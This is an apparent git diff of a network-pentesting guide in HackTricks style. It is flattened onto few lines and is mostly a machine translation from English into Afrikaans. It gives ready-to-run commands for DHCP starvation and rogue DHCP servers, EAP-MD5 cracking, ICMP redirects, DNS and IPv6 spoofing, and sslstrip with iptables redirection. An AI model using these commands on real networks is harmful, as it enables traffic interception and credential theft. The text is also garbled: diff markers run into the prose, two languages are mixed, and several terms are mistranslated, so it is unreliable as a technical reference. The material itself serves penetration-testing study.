om te sien of die DHCP-bedieners reageer. +4. 
As die DHCP-bedieners reageer, kan dit dui op 'n moontlike kwesbaarheid in die netwerk. + +#### DHCP Spoofing + +Die DHCP Spoofing-aanval kan uitgevoer word deur die volgende stappe te volg: + +1. Installeer 'n DHCP Spoofing-hulpmiddel soos `dhcpig` of `ettercap`. +2. Stel die hulpmiddel in om valse DHCP-antwoorde na die kliënttoestelle in die netwerk te stuur. +3. Monitor die netwerk om te sien of die kliënttoestelle die valse DHCP-antwoorde aanvaar. +4. As die kliënttoestelle die valse DHCP-antwoorde aanvaar, kan dit lei tot die oorname van IP-adresse en die onderskepping van netwerkverkeer. + +#### Voorkoming + +Om DHCP-aanvalle te voorkom, kan die volgende maatreëls geneem word: + +1. Implementeer 'n sterk netwerksekuriteitsbeleid wat die gebruik van DHCP-aanvalle verbied. +2. Monitor die netwerk vir verdagte DHCP-aktiwiteit en reageer vinnig op enige inbreukpogings. +3. Stel 'n DHCP-snoepie op om die netwerk teen DHCP-aanvalle te beskerm. +4. Verseker dat alle toestelle in die netwerk opgedateer en gepatch is om bekende DHCP-kwesbaarhede te voorkom. + +#### Bronne + +- [DHCP Starvation](https://book.hacktricks.xyz/pentesting/pentesting-network/dhcp-starvation) +- [DHCP Spoofing](https://book.hacktricks.xyz/pentesting/pentesting-network/dhcp-spoofing) ```bash nmap --script broadcast-dhcp-discover Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT WARNING: No targets were specified, so 0 hosts scanned. Pre-scan script results: -| broadcast-dhcp-discover: -| Response 1 of 1: +| broadcast-dhcp-discover: +| Response 1 of 1: | IP Offered: 192.168.1.250 | DHCP Message Type: DHCPOFFER | Server Identifier: 192.168.1.1 
@@ -563,68 +583,61 @@ Pre-scan script results: |_ Domain Name: mynet Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds ``` - **DoS** -**Two types of DoS** could be performed against DHCP servers. The first one consists on **simulate enough fake hosts to use all the possible IP addresses**.\ -This attack will work only if you can see the responses of the DHCP server and complete the protocol (**Discover** (Comp) --> **Offer** (server) --> **Request** (Comp) --> **ACK** (server)). For example, this is **not possible in Wifi networks**. - -Another way to perform a DHCP DoS is to send a **DHCP-RELEASE packet using as source code every possible IP**. Then, the server will think that everybody has finished using the IP. +Daar kan **twee tipes DoS** teen DHCP-bedieners uitgevoer word. Die eerste een behels om genoeg valse gasheer te simuleer om al die moontlike IP-adresse te gebruik.\ +Hierdie aanval sal slegs werk as jy die antwoorde van die DHCP-bediener kan sien en die protokol voltooi (**Discover** (Rekenaar) --> **Offer** (bediener) --> **Request** (Rekenaar) --> **ACK** (bediener)). Byvoorbeeld, dit is **nie moontlik in WiFi-netwerke** nie. +'n Ander manier om 'n DHCP DoS uit te voer, is om 'n **DHCP-RELEASE-pakket te stuur met behulp van elke moontlike IP as bronkode**. Dan sal die bediener dink dat almal klaar is met die gebruik van die IP. ```bash yersinia dhcp -attack 1 yersinia dhcp -attack 3 #More parameters are needed ``` +'n Meer outomatiese manier om dit te doen, is deur die hulpmiddel [DHCPing](https://github.com/kamorin/DHCPig) te gebruik. -A more automatic way of doing this is using the tool [DHCPing](https://github.com/kamorin/DHCPig) +Jy kan die genoemde DoS-aanvalle gebruik om kliënte te dwing om nuwe leases binne die omgewing te verkry en om legitieme bedieners uit te put sodat hulle onreageerbaar word. So wanneer die legitieme bedieners probeer herverbind, **kan jy skadelike waardes bedien soos in die volgende aanval genoem**. 
-You could use the mentioned DoS attacks to force clients to obtain new leases within the environment, and exhaust legitimate servers so that they become unresponsive. So when the legitimate try to reconnect, **you can server malicious values mentioned in the next attack**. +#### Stel skadelike waardes in -#### Set malicious values +'n Skelm DHCP-bediener kan opgestel word deur die DHCP-skripsie wat by `/usr/share/responder/DHCP.py` geleë is, te gebruik. Dit is nuttig vir netwerkaanvalle, soos die vasvang van HTTP-verkeer en geloofsbriewe, deur verkeer na 'n skadelike bediener om te lei. Stel egter 'n skelm roeteringstoestel op is minder effektief omdat dit slegs uitgaande verkeer van die kliënt toelaat en die antwoorde van die werklike roeteringstoestel mis. Daarom word dit aanbeveel om 'n skelm DNS- of WPAD-bediener op te stel vir 'n meer effektiewe aanval. -A rogue DHCP server can be set up using the DHCP script located at `/usr/share/responder/DHCP.py`. This is useful for network attacks, like capturing HTTP traffic and credentials, by redirecting traffic to a malicious server. However, setting a rogue gateway is less effective since it only allows capturing outbound traffic from the client, missing the responses from the real gateway. Instead, setting up a rogue DNS or WPAD server is recommended for a more effective attack. +Hieronder is die opdragopsies vir die konfigurering van die skelm DHCP-bediener: -Below are the command options for configuring the rogue DHCP server: - -- **Our IP Address (Gateway Advertisement)**: Use `-i 10.0.0.100` to advertise your machine's IP as the gateway. -- **Local DNS Domain Name**: Optionally, use `-d example.org` to set a local DNS domain name. -- **Original Router/Gateway IP**: Use `-r 10.0.0.1` to specify the IP address of the legitimate router or gateway. -- **Primary DNS Server IP**: Use `-p 10.0.0.100` to set the IP address of the rogue DNS server you control. 
-- **Secondary DNS Server IP**: Optionally, use `-s 10.0.0.1` to set a secondary DNS server IP. -- **Netmask of Local Network**: Use `-n 255.255.255.0` to define the netmask for the local network. -- **Interface for DHCP Traffic**: Use `-I eth1` to listen for DHCP traffic on a specific network interface. -- **WPAD Configuration Address**: Use `-w “http://10.0.0.100/wpad.dat”` to set the address for WPAD configuration, assisting in web traffic interception. -- **Spoof Default Gateway IP**: Include `-S` to spoof the default gateway IP address. -- **Respond to All DHCP Requests**: Include `-R` to make the server respond to all DHCP requests, but be aware that this is noisy and can be detected. - -By correctly using these options, a rogue DHCP server can be established to intercept network traffic effectively. +- **Ons IP-adres (Roeteringstoestel-advertensie)**: Gebruik `-i 10.0.0.100` om jou masjien se IP-adres as die roeteringstoestel te adverteer. +- **Plaaslike DNS-domeinnaam**: Opsioneel, gebruik `-d example.org` om 'n plaaslike DNS-domeinnaam in te stel. +- **Oorspronklike Router/Roeteringstoestel-IP**: Gebruik `-r 10.0.0.1` om die IP-adres van die legitieme router of roeteringstoestel te spesifiseer. +- **Primêre DNS-bediener-IP**: Gebruik `-p 10.0.0.100` om die IP-adres van die skelm DNS-bediener wat jy beheer, in te stel. +- **Sekondêre DNS-bediener-IP**: Opsioneel, gebruik `-s 10.0.0.1` om 'n sekondêre DNS-bediener-IP in te stel. +- **Netmasker van Plaaslike Netwerk**: Gebruik `-n 255.255.255.0` om die netmasker vir die plaaslike netwerk te definieer. +- **Koppelvlak vir DHCP-verkeer**: Gebruik `-I eth1` om te luister vir DHCP-verkeer op 'n spesifieke netwerkkoppelvlak. +- **WPAD-konfigurasie-adres**: Gebruik `-w "http://10.0.0.100/wpad.dat"` om die adres vir WPAD-konfigurasie in te stel, wat help met die onderskepping van webverkeer. +- **Spoof Verstekroeteringstoestel-IP**: Sluit `-S` in om die IP-adres van die verstekroeteringstoestel te vervals. 
+- **Reageer op Alle DHCP-Aanvrae**: Sluit `-R` in om die bediener op alle DHCP-aanvrae te laat reageer, maar wees bewus dat dit lawaaierig is en opgespoor kan word. +Deur hierdie opsies korrek te gebruik, kan 'n skelm DHCP-bediener opgestel word om netwerkverkeer doeltreffend te onderskep. ```python # Example to start a rogue DHCP server with specified options !python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R ``` +### **EAP Aanvalle** -### **EAP Attacks** +Hier is 'n paar aanvalstaktieke wat teen 802.1X-implementasies gebruik kan word: -Here are some of the attack tactics that can be used against 802.1X implementations: - -* Active brute-force password grinding via EAP -* Attacking the RADIUS server with malformed EAP content _\*\*_(exploits) -* EAP message capture and offline password cracking (EAP-MD5 and PEAP) -* Forcing EAP-MD5 authentication to bypass TLS certificate validation -* Injecting malicious network traffic upon authenticating using a hub or similar - -If the attacker if between the victim and the authentication server, he could try to degrade (if necessary) the authentication protocol to EAP-MD5 and capture the authentication attempt. Then, he could brute-force this using: +* Aktiewe brute-force wagwoord slyp deur middel van EAP +* Aanval op die RADIUS-bediener met misvormde EAP-inhoud _(uitbuitings)_ +* EAP-boodskap vaslegging en aflyn wagwoordkraking (EAP-MD5 en PEAP) +* Dwang van EAP-MD5-verifikasie om TLS-sertifikaatvalidering te omseil +* Injeksie van skadelike netwerkverkeer tydens verifikasie met behulp van 'n hub of soortgelyk +As die aanvaller tussen die slagoffer en die verifikasiebediener is, kan hy probeer om (indien nodig) die verifikasieprotokol na EAP-MD5 te degradeer en die verifikasiepoging vas te vang. 
Daarna kan hy dit brute-force gebruik deur: ``` eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt ``` +### FHRP (GLBP & HSRP) Aanvalle -### FHRP (GLBP & HSRP) Attacks +**FHRP** (Eerste Sprong Redundansie Protokol) is 'n klas van netwerkprotokolle wat ontwerp is om 'n warm redundante roetesisteem te skep. Met FHRP kan fisiese roetingsapparate gekombineer word in 'n enkele logiese toestel, wat fouttoleransie verhoog en help om die las te verdeel. -**FHRP** (First Hop Redundancy Protocol) is a class of network protocols designed to **create a hot redundant routing system**. With FHRP, physical routers can be combined into a single logical device, which increases fault tolerance and helps distribute the load. - -**Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP.** +**Cisco Systems-ingenieurs het twee FHRP-protokolle ontwikkel, GLBP en HSRP.** {% content-ref url="glbp-and-hsrp-attacks.md" %} [glbp-and-hsrp-attacks.md](glbp-and-hsrp-attacks.md) 
@@ -632,89 +645,111 @@ eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt ### RIP -Three versions of the Routing Information Protocol (RIP) are known to exist: RIP, RIPv2, and RIPng. Datagrams are sent to peers via port 520 using UDP by RIP and RIPv2, whereas datagrams are broadcasted to UDP port 521 via IPv6 multicast by RIPng. Support for MD5 authentication was introduced by RIPv2. On the other hand, native authentication is not incorporated by RIPng; instead, reliance is placed on optional IPsec AH and ESP headers within IPv6. +Daar is drie weergawes van die Routing Information Protocol (RIP) bekend: RIP, RIPv2 en RIPng. Datagramme word deur RIP en RIPv2 na eweknieë gestuur via poort 520 met behulp van UDP, terwyl datagramme na UDP-poort 521 via IPv6-multisending deur RIPng uitgesaai word. Ondersteuning vir MD5-verifikasie is deur RIPv2 ingevoer. Aan die ander kant word inheemse verifikasie nie deur RIPng ingesluit nie; in plaas daarvan word daar staatgemaak op opsionele IPsec AH- en ESP-koppe in IPv6. -- **RIP and RIPv2:** Communication is done through UDP datagrams on port 520. -- **RIPng:** Utilizes UDP port 521 for broadcasting datagrams via IPv6 multicast. +- **RIP en RIPv2:** Kommunikasie vind plaas deur UDP-datagramme op poort 520. +- **RIPng:** Maak gebruik van UDP-poort 521 om datagramme via IPv6-multisending uit te saai. -Note that RIPv2 supports MD5 authentication while RIPng does not include native authentication, relying on IPsec AH and ESP headers in IPv6. +Let daarop dat RIPv2 MD5-verifikasie ondersteun terwyl RIPng nie inheemse verifikasie insluit nie, maar staatmaak op IPsec AH- en ESP-koppe in IPv6. -### EIGRP Attacks +### EIGRP Aanvalle -**EIGRP (Enhanced Interior Gateway Routing Protocol)** is a dynamic routing protocol. **It is a distance-vector protocol.** If there is **no authentication** and configuration of passive interfaces, an **intruder** can interfere with EIGRP routing and cause **routing tables poisoning**. 
Moreover, EIGRP network (in other words, autonomous system) **is flat and has no segmentation into any zones**. If an **attacker injects a route**, it is likely that this route will **spread** throughout the autonomous EIGRP system. +**EIGRP (Enhanced Interior Gateway Routing Protocol)** is 'n dinamiese roetingsprotokol. Dit is 'n afstand-vector protokol. As daar **geen verifikasie** en konfigurasie van passiewe interfaces is nie, kan 'n **indringer** inmeng met EIGRP-roetings en **roetetabellevergiftiging** veroorsaak. Verder is die EIGRP-netwerk (met ander woorde, outonome stelsel) **plat en het geen segmentering in enige sones nie**. As 'n **aanvaller 'n roete inspuit**, is dit waarskynlik dat hierdie roete deur die outonome EIGRP-stelsel sal **versprei**. -To attack a EIGRP system requires **establishing a neighbourhood with a legitimate EIGRP route**r, which opens up a lot of possibilities, from basic reconnaissance to various injections. +Om 'n EIGRP-stelsel aan te val, vereis dit **die vestiging van 'n nabuurskap met 'n wettige EIGRP-roeteerder**, wat baie moontlikhede bied, van basiese verkenning tot verskeie inspuitings. -[**FRRouting**](https://frrouting.org/) allows you to implement **a virtual router that supports BGP, OSPF, EIGRP, RIP and other protocols.** All you need to do is deploy it on your attacker’s system and you can actually pretend to be a legitimate router in the routing domain. +[**FRRouting**](https://frrouting.org/) stel jou in staat om **'n virtuele router te implementeer wat BGP, OSPF, EIGRP, RIP en ander protokolle ondersteun**. Al wat jy hoef te doen, is om dit op jou aanvaller se stelsel te implementeer en jy kan eintlik voorgee om 'n wettige router in die roetingsdomein te wees. {% content-ref url="eigrp-attacks.md" %} [eigrp-attacks.md](eigrp-attacks.md) {% endcontent-ref %} -[**Coly**](https://code.google.com/p/coly/) has capabilities for intercepting EIGRP (Enhanced Interior Gateway Routing Protocol) broadcasts. 
It also allows for the injection of packets, which can be utilized to alter routing configurations. +[**Coly**](https://code.google.com/p/coly/) het die vermoë om EIGRP (Enhanced Interior Gateway Routing Protocol) uitsendings te onderskep. Dit maak ook die inspuiting van pakkies moontlik, wat gebruik kan word om roetingskonfigurasies te verander. ### OSPF -In Open Shortest Path First (OSPF) protocol **MD5 authentication is commonly employed to ensure secure communication between routers**. However, this security measure can be compromised using tools like Loki and John the Ripper. These tools are capable of capturing and cracking MD5 hashes, exposing the authentication key. Once this key is obtained, it can be used to introduce new routing information. To configure the route parameters and establish the compromised key, the _Injection_ and _Connection_ tabs are utilized, respectively. +In die Open Shortest Path First (OSPF) protokol word **MD5-verifikasie algemeen gebruik om veilige kommunikasie tussen roeteerders te verseker**. Hierdie veiligheidsmaatreël kan egter gekompromitteer word deur middel van gereedskap soos Loki en John the Ripper. Hierdie gereedskap is in staat om MD5-hashes vas te vang en te kraak, wat die verifikasiesleutel blootstel. Sodra hierdie sleutel verkry is, kan dit gebruik word om nuwe roetingsinligting in te voer. Om die roete-parameters te konfigureer en die gekompromitteerde sleutel te vestig, word onderskeidelik die _Injection_ en _Connection_ lêers gebruik. -- **Capturing and Cracking MD5 Hashes:** Tools such as Loki and John the Ripper are used for this purpose. -- **Configuring Route Parameters:** This is done through the _Injection_ tab. -- **Setting the Compromised Key:** The key is configured under the _Connection_ tab. +- **Vasvang en Kraak van MD5-hashes:** Gereedskap soos Loki en John the Ripper word hiervoor gebruik. +- **Konfigurering van Roete-parameters:** Dit word gedoen deur middel van die _Injection_ lêer. 
+- **Vestiging van die Gekompromitteerde Sleutel:** Die sleutel word gekonfigureer onder die _Connection_ lêer. -### Other Generic Tools & Sources +### Ander Algemene Gereedskap & Bronne -* [**Above**](https://github.com/c4s73r/Above): Tool to scan network traffic and find vulnerabilities -* You can find some **more information about network attacks [here](https://github.com/Sab0tag3d/MITM-cheatsheet)**. +* [**Above**](https://github.com/c4s73r/Above): Gereedskap om netwerkverkeer te skandeer en kwesbaarhede te vind +* Jy kan **meer inligting oor netwerkaanvalle [hier](https://github.com/Sab0tag3d/MITM-cheatsheet)** vind. ## **Spoofing** -The attacker configures all the network parameters (GW, IP, DNS) of the new member of the network sending fake DHCP responses. - +Die aanvaller stel al die netwerkparameters (GW, IP, DNS) van die nuwe lid van die netwerk in deur valse DHCP-antwoorde te stuur. ```bash Ettercap yersinia dhcp -attack 2 #More parameters are needed ``` - ### ARP Spoofing -Check the [previous section](./#arp-spoofing). +Kyk na die [vorige afdeling](./#arp-spoofing). ### ICMPRedirect -ICMP Redirect consist on sending an ICMP packet type 1 code 5 that indicates that the attacker is the best way to reach an IP. Then, when the victim wants to contact the IP, it will send the packet through the attacker. - +ICMP-omleiding behels die stuur van 'n ICMP-pakket tipe 1 kode 5 wat aandui dat die aanvaller die beste manier is om 'n IP te bereik. Dan, wanneer die slagoffer die IP wil kontak, sal dit die pakket deur die aanvaller stuur. ```bash Ettercap icmp_redirect hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5] ``` - ### DNS Spoofing -The attacker will resolve some (or all) the domains that the victim ask for. 
- +Die aanvaller sal sommige (of al) die domeine wat die slagoffer vra, oplos. ```bash set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on ``` +**Stel jou eie DNS in met dnsmasq** -**Configure own DNS with dnsmasq** +Om jou eie DNS in te stel met dnsmasq, kan jy die volgende stappe volg: +1. Installeer dnsmasq op jou bediener: + ``` + sudo apt-get install dnsmasq + ``` + +2. Maak 'n nuwe konfigurasie-lêer vir dnsmasq: + ``` + sudo nano /etc/dnsmasq.conf + ``` + +3. Voeg die volgende reëls by in die konfigurasie-lêer: + ``` + interface=eth0 + listen-address=127.0.0.1 + bind-interfaces + no-resolv + server=8.8.8.8 + server=8.8.4.4 + ``` + +4. Stel jou DNS-instellings in op jou bediener se netwerkinstellings om na 127.0.0.1 te verwys. + +5. Herlaai dnsmasq om die veranderinge toe te pas: + ``` + sudo systemctl reload dnsmasq + ``` + +Nou is jou dnsmasq DNS ingestel en gereed om DNS-navrae te hanteer. Jy kan dit gebruik om DNS-verwysings te manipuleer en aanvalle soos DNS-vergiftiging uit te voer. ```bash apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1 domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon dig @localhost domain.example.com # Test the configured DNS ``` +### Plaaslike Hekke -### Local Gateways - -Multiple routes to systems and networks often exist. Upon building a list of MAC addresses within the local network, use _gateway-finder.py_ to identify hosts that support IPv4 forwarding. - +Daar is dikwels verskeie roetes na stelsels en netwerke. Nadat 'n lys van MAC-adresse binne die plaaslike netwerk opgestel is, gebruik _gateway-finder.py_ om gasheerstelsels te identifiseer wat IPv4 deurstuur ondersteun. 
``` root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git root@kali:~# cd gateway-finder/ root@kali:~# arp-scan -l | tee hosts.txt Interface: eth0, datalink type: EN10MB (Ethernet) -Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/) +Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/) 10.0.0.100 00:13:72:09:ad:76 Dell Inc. 10.0.0.200 00:90:27:43:c0:57 INTEL CORPORATION 10.0.0.254 00:08:74:c0:40:ce Dell Computer Corp. 
@@ -726,67 +761,58 @@ gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder [+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100] [+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100] ``` +### [Spoofing LLMNR, NBT-NS, en mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) -### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) +Vir plaaslike gasheeroplossing wanneer DNS-opsoekings nie suksesvol is nie, steun Microsoft-stelsels op **Link-Local Multicast Name Resolution (LLMNR)** en die **NetBIOS Name Service (NBT-NS)**. Soortgelyk maak **Apple Bonjour** en **Linux zero-configuration**-implementasies gebruik van **Multicast DNS (mDNS)** om stelsels binne 'n netwerk te ontdek. As gevolg van die ongeagte aard van hierdie protokolle en hul werking oor UDP, uitsaai-boodskappe, kan dit deur aanvallers uitgebuit word om gebruikers na kwaadwillige dienste om te lei. -For local host resolution when DNS lookups are unsuccessful, Microsoft systems rely on **Link-Local Multicast Name Resolution (LLMNR)** and the **NetBIOS Name Service (NBT-NS)**. Similarly, **Apple Bonjour** and **Linux zero-configuration** implementations utilize **Multicast DNS (mDNS)** for discovering systems within a network. Due to the unauthenticated nature of these protocols and their operation over UDP, broadcasting messages, they can be exploited by attackers aiming to redirect users to malicious services. - -You can impersonate services that are searched by hosts using Responder to send fake responses.\ -Read here more information about [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md). +Jy kan dienste naboots deur Responder te gebruik om valse reaksies te stuur.\ +Lees hier meer inligting oor [hoe om dienste met Responder te naboots](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md). 
### [Spoofing WPAD](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) -Browsers commonly employ the **Web Proxy Auto-Discovery (WPAD) protocol to automatically acquire proxy settings**. This involves fetching configuration details from a server, specifically through a URL such as "http://wpad.example.org/wpad.dat". The discovery of this server by the clients can happen through various mechanisms: +Webblaaier maak gewoonlik gebruik van die **Web Proxy Auto-Discovery (WPAD) protokol om outomaties proksi-instellings te bekom**. Dit behels die ophaling van konfigurasiebesonderhede van 'n bediener, spesifiek deur 'n URL soos "http://wpad.example.org/wpad.dat". Die ontdekking van hierdie bediener deur die kliënte kan plaasvind deur verskeie meganismes: -- Through **DHCP**, where the discovery is facilitated by utilizing a special code 252 entry. -- By **DNS**, which involves searching for a hostname labeled _wpad_ within the local domain. -- Via **Microsoft LLMNR and NBT-NS**, which are fallback mechanisms used in cases where DNS lookups do not succeed. +- Deur **DHCP**, waar die ontdekking gefasiliteer word deur 'n spesiale kode 252-inskrywing te gebruik. +- Deur **DNS**, wat die soeke na 'n gasheernaam met die etiket _wpad_ binne die plaaslike domein behels. +- Via **Microsoft LLMNR en NBT-NS**, wat terugvalmeganismes is wat gebruik word in gevalle waar DNS-opsoekings nie slaag nie. -The tool Responder takes advantage of this protocol by acting as a **malicious WPAD server**. It uses DHCP, DNS, LLMNR, and NBT-NS to mislead clients into connecting to it. To dive deeper into how services can be impersonated using Responder [check this](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md). +Die hulpmiddel Responder maak gebruik van hierdie protokol deur as 'n **kwaadwillige WPAD-bedieners** op te tree. Dit maak gebruik van DHCP, DNS, LLMNR en NBT-NS om kliënte te mislei om daarmee te verbind. 
Om dieper in te gaan op hoe dienste met behulp van Responder nageboots kan word, [kyk hier](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md). +### [Spoofing SSDP en UPnP-toestelle](spoofing-ssdp-and-upnp-devices.md) -### [Spoofing SSDP and UPnP devices](spoofing-ssdp-and-upnp-devices.md) - -You can offer different services in the network to try to **trick a user** to enter some **plain-text credentials**. **More information about this attack in** [**Spoofing SSDP and UPnP Devices**](spoofing-ssdp-and-upnp-devices.md)**.** +Jy kan verskillende dienste in die netwerk aanbied om 'n gebruiker te **mislei** om sekere **plat-tekslegitimasie** in te voer. **Meer inligting oor hierdie aanval in** [**Spoofing SSDP en UPnP-toestelle**](spoofing-ssdp-and-upnp-devices.md)**.** ### IPv6 Neighbor Spoofing -This attack is very similar to ARP Spoofing but in the IPv6 world. You can get the victim think that the IPv6 of the GW has the MAC of the attacker. - +Hierdie aanval is baie soortgelyk aan ARP Spoofing, maar in die IPv6-wêreld. Jy kan die slagoffer laat dink dat die IPv6 van die GW die MAC van die aanvaller het. ```bash sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested sudo fake_advertise6 -r -w 2 eth0 #This option will send the Neighbor Advertisement packet every 2 seconds ``` +### IPv6 Router Advertensie Spoofing/Flooding -### IPv6 Router Advertisement Spoofing/Flooding - -Some OS configure by default the gateway from the RA packets sent in the network. To declare the attacker as IPv6 router you can use: - +Sommige bedryfstelsels stel outomaties die gateway in vanaf die RA-pakette wat in die netwerk gestuur word. 
Om die aanvaller as 'n IPv6-router te verklaar, kan jy gebruik maak van: ```bash sysctl -w net.ipv6.conf.all.forwarding=1 4 ip route add default via dev wlan0 fake_router6 wlan0 fe80::01/16 ``` - ### IPv6 DHCP spoofing -By default some OS try to configure the DNS reading a DHCPv6 packet in the network. Then, an attacker could send a DHCPv6 packet to configure himself as DNS. The DHCP also provides an IPv6 to the victim. - +Standaard probeer sommige besturingstelsels om die DNS te konfigureer deur 'n DHCPv6-pakket in die netwerk te lees. 'n Aanvaller kan dan 'n DHCPv6-pakket stuur om homself as DNS te konfigureer. Die DHCP voorsien ook 'n IPv6 aan die slagoffer. ```bash dhcp6.spoof on dhcp6.spoof.domains mitm6 ``` +### HTTP (valsblad en JS-kode-inspuiting) -### HTTP (fake page and JS code injection) - -## Internet Attacks +## Internet Aanvalle ### sslStrip -Basically what this attack does is, in case the **user** try to **access** a **HTTP** page that is **redirecting** to the **HTTPS** version. **sslStrip** will **maintain** a **HTTP connection with** the **client and** a **HTTPS connection with** the **server** so it ill be able to **sniff** the connection in **plain text**. - +Wat hierdie aanval basies doen, is dat as die **gebruiker** probeer om 'n **HTTP**-bladsy te **besoek** wat na die **HTTPS**-weergawe omskakel, **sslStrip** 'n **HTTP-verbinding met** die **kliënt** en 'n **HTTPS-verbinding met** die **bediener** sal **handhaaf**, sodat dit die verbinding in **plat teks** kan **sniff**. ```bash apt-get install sslstrip sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k 
@@ -795,33 +821,29 @@ sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT ``` +Meer inligting [hier](https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf). -More info [here](https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf). +### sslStrip+ en dns2proxy vir omseil van HSTS -### sslStrip+ and dns2proxy for bypassing HSTS +Die **verskil** tussen **sslStrip+ en dns2proxy** teenoor **sslStrip** is dat hulle byvoorbeeld _**www.facebook.com**_ sal **omlei** na _**wwww.facebook.com**_ (let op die **ekstra** "**w**") en die **adres van hierdie domein as die aanvaller se IP** sal stel. Op hierdie manier sal die **kliënt** verbind met _**wwww.facebook.com**_ **(die aanvaller)**, maar agter die skerms sal **sslstrip+** die **werklike verbinding** via HTTPS met **www.facebook.com** behou. -The **difference** between **sslStrip+ and dns2proxy** against **sslStrip** is that they will **redirect** for example _**www.facebook.com**_ **to** _**wwww.facebook.com**_ (note the **extra** "**w**") and will set the **address of this domain as the attacker IP**. This way, the **client** will **connect** to _**wwww.facebook.com**_ **(the attacker)** but behind the scenes **sslstrip+** will **maintain** the **real connection** via https with **www.facebook.com**. +Die **doel** van hierdie tegniek is om **HSTS te omseil**, want _**wwww**.facebook.com_ sal nie in die **geheue** van die webblaaier gestoor word nie, sodat die webblaaier mislei sal word om **Facebook-verifikasie in HTTP** uit te voer.\ +Let daarop dat die slagoffer aanvanklik moet probeer om toegang te verkry tot [http://www.faceook.com](http://www.faceook.com) en nie HTTPS nie. Dit kan gedoen word deur die skakels binne 'n HTTP-bladsy te wysig. 
-The **goal** of this technique is to **avoid HSTS** because _**wwww**.facebook.com_ **won't** be saved in the **cache** of the browser, so the browser will be tricked to perform **facebook authentication in HTTP**.\ -Note that in order to perform this attack the victim has to try to access initially to [http://www.faceook.com](http://www.faceook.com) and not https. This can be done modifying the links inside an http page. +Meer inligting [hier](https://www.bettercap.org/legacy/#hsts-bypass), [hier](https://www.slideshare.net/Fatuo\_\_/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) en [hier](https://security.stackexchange.com/questions/91092/how-does-bypassing-hsts-with-sslstrip-work-exactly). -More info [here](https://www.bettercap.org/legacy/#hsts-bypass), [here](https://www.slideshare.net/Fatuo\_\_/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) and [here](https://security.stackexchange.com/questions/91092/how-does-bypassing-hsts-with-sslstrip-work-exactly). - -**sslStrip or sslStrip+ doesn;t work anymore. This is because there are HSTS rules presaved in the browsers, so even if it's the first time that a user access an "important" domain he will access it via HTTPS. Also, notice that the presaved rules and other generated rules can use the flag** [**`includeSubdomains`**](https://hstspreload.appspot.com) **so the** _**wwww.facebook.com**_ **example from before won't work anymore as** _**facebook.com**_ **uses HSTS with `includeSubdomains`.** +**sslStrip of sslStrip+ werk nie meer nie. Dit is omdat daar HSTS-reëls voorgesit word in die webblaaier, sodat selfs as dit die eerste keer is dat 'n gebruiker toegang verkry tot 'n "belangrike" domein, sal hy dit via HTTPS toegang verkry. 
Let ook daarop dat die voorgesitde reëls en ander gegenereerde reëls die vlag** [**`includeSubdomains`**](https://hstspreload.appspot.com) **kan gebruik, sodat die vorige voorbeeld van** _**wwww.facebook.com**_ **nie meer sal werk nie, aangesien** _**facebook.com**_ **HSTS met `includeSubdomains` gebruik.** TODO: easy-creds, evilgrade, metasploit, factory -## TCP listen in port - +## TCP luister op poort ```bash sudo nc -l -p 80 socat TCP4-LISTEN:80,fork,reuseaddr - ``` +## TCP + SSL luister op poort -## TCP + SSL listen in port - -#### Generate keys and self-signed certificate - +#### Genereer sleutels en zelfondertekend sertifikaat ``` FILENAME=server # Generate a public/private key pair: 
